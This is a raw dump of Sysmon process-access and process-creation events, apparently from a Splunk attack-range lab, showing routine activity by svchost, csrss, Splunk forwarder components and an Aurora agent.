12:23:33.861{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044181Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.861{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044180Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.861{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044179Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.861{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044178Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.861{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E4C5-63C7-5706-00000000AF02}4656C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044177Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.861{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E4C5-63C7-5706-00000000AF02}4656C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044176Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.860{FE4C2B44-E4C5-63C7-5706-00000000AF02}4656C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000044175Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.162{FE4C2B44-E4C5-63C7-5606-00000000AF02}43245620C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044174Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.013{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E4C5-63C7-5606-00000000AF02}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044173Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.013{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044172Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.013{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044171Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.013{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044170Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.013{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044169Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.013{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E4C5-63C7-5606-00000000AF02}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044168Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.013{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E4C5-63C7-5606-00000000AF02}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044167Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:33.015{FE4C2B44-E4C5-63C7-5606-00000000AF02}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000016951Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:33.137{E5A8D418-E4C4-63C7-0F02-00000000B002}29482540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016950Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:33.069{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E4C4-63C7-0F02-00000000B002}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000016949Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:33.069{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E4C4-63C7-0F02-00000000B002}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000016948Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:33.069{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E4C4-63C7-0F02-00000000B002}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000016947Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:33.068{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E4C4-63C7-0F02-00000000B002}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000016946Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:33.068{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E4C4-63C7-0F02-00000000B002}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000016945Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:33.068{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E4C4-63C7-0F02-00000000B002}2948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000044218Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.969{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044217Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.967{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000044216Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.964{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 23542300x800000000000000016966Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:34.926{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B69BDBEF0A5F78BEE43B6A5C0509609,SHA256=98ABC607B1E74D4B69168023D44B2D29E96A762BFDAF44E425DD593C53FA1C32,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044215Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.961{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044214Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.935{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044213Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 